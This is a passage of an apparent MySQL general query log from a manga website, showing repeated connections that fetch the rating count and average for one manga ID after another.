AS total FROM genres AS g) as k where k.total > 0 order by name 330638828 Quit 330638829 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330638829 Quit 330638830 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330638830 Quit 330638831 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330638831 Quit 330638832 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330638832 Quit 330638833 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330638833 Quit 330638834 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330638834 Quit 330638835 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330638835 Quit 330638836 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330638836 Quit 330638837 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330638837 Quit 330638838 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330638838 Quit 330638839 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330638839 Quit 330638840 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330638840 Quit 330638841 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330638841 Quit 330638842 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330638842 Quit 330638843 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330638843 Quit 330638844 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330638844 Quit 330638845 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330638845 Quit 330638846 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330638846 Quit 330638847 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330638847 Quit 330638848 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330638848 Quit 330638849 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330638849 Quit 330638850 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330638850 Quit 330638851 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330638851 Quit 330638852 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330638852 Quit 330638853 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330638853 Quit 330638854 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330638854 Quit 330638855 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330638855 Quit 330638856 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330638856 Quit 330638857 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330638857 Quit 330638858 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '163' order by created desc 330638858 Quit 330638859 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330638859 Quit 330638860 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330638860 Quit 330638861 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330638861 Quit 330638862 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330638862 Quit 330638863 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330638863 Quit 330638864 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330638864 Quit 330638865 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330638865 Quit 330638866 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330638866 Quit 330638867 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330638867 Quit 330638868 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330638868 Quit 330638869 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330638869 Quit 330638870 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330638870 Quit 330638871 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330638871 Quit 330638872 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330638872 Quit 330638873 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330638873 Quit 330638874 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330638874 Quit 330638875 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330638875 Quit 330638876 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330638876 Quit 330638877 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '140' order by created desc 330638877 Quit 330638878 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330638878 Quit 330638879 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330638879 Quit 330638880 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330638880 Quit 330638881 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330638881 Quit 330638882 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330638882 Quit 330638883 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330638883 Quit 330638884 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '95' order by created desc 330638884 Quit 330638885 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330638885 Quit 330638886 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330638886 Quit 330638887 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330638887 Quit 330638888 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330638888 Quit 330638889 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330638889 Quit 330638890 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330638890 Quit 330638891 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330638891 Quit 330638892 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330638892 Quit 330638893 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330638893 Quit 330638894 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330638894 Quit 330638895 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '159' order by created desc 330638895 Quit 330638896 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330638896 Quit 330638897 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330638897 Quit 330638898 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330638898 Quit 330638899 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330638899 Quit 330638900 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330638900 Quit 330638901 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330638901 Quit 330638902 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330638902 Quit 330638903 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330638903 Quit 330638904 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '155' order by created desc 330638904 Quit 330638905 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330638905 Quit 330638906 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330638906 Quit 330638907 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330638907 Quit 330638908 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330638908 Quit 330638909 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330638909 Quit 330638910 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '69' order by created desc 330638910 Quit 330638911 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330638911 Quit 330638912 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330638912 Quit 330638913 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330638913 Quit 330638914 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330638914 Quit 330638915 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330638915 Quit 330638916 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330638916 Quit 330638917 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330638917 Quit 330638918 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330638918 Quit 330638919 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330638919 Quit 330638920 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330638920 Quit 330638921 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330638921 Quit 330638922 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330638922 Quit 330638923 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330638923 Quit 330638924 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330638924 Quit 330638925 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330638925 Quit 330638926 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330638926 Quit 330638927 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330638927 Quit 330638928 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330638928 Quit 330638929 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330638929 Quit 330638930 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330638930 Quit 330638931 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330638931 Quit 330638932 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330638932 Quit 330638933 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '79' order by created desc 330638933 Quit 330638934 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330638934 Quit 330638935 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330638935 Quit 330638936 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330638936 Quit 330638937 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330638937 Quit 330638938 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330638938 Quit 330638939 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330638939 Quit 330638940 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330638940 Quit 330638941 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330638941 Quit 330638942 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330638942 Quit 330638943 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330638943 Quit 330638944 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330638944 Quit 330638945 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330638945 Quit 330638946 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330638946 Quit 330638947 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330638947 Quit 330638948 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330638948 Quit 330638949 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330638949 Quit 330638950 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330638950 Quit 330638951 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330638951 Quit 330638952 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330638952 Quit 330638953 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330638953 Quit 330638954 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330638954 Quit 330638955 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330638955 Quit 330638956 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330638956 Quit 330638957 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330638957 Quit 330638958 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330638958 Quit 330638959 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330638959 Quit 330638960 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330638960 Quit 330638961 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330638961 Quit 330638962 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330638962 Quit 330638963 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330638963 Quit 330638964 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330638964 Quit 330638965 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330638965 Quit 330638966 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330638966 Quit 330638967 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330638967 Quit 330638968 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330638968 Quit 330638969 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330638969 Quit 330638970 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330638970 Quit 330638971 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330638971 Quit 330638972 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330638972 Quit 330638973 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330638973 Quit 330638974 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330638974 Quit 330638975 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330638975 Quit 330638976 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330638976 Quit 330638977 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330638977 Quit 330638978 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330638978 Quit 330638979 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330638979 Quit 330638980 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330638980 Quit 330638981 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating 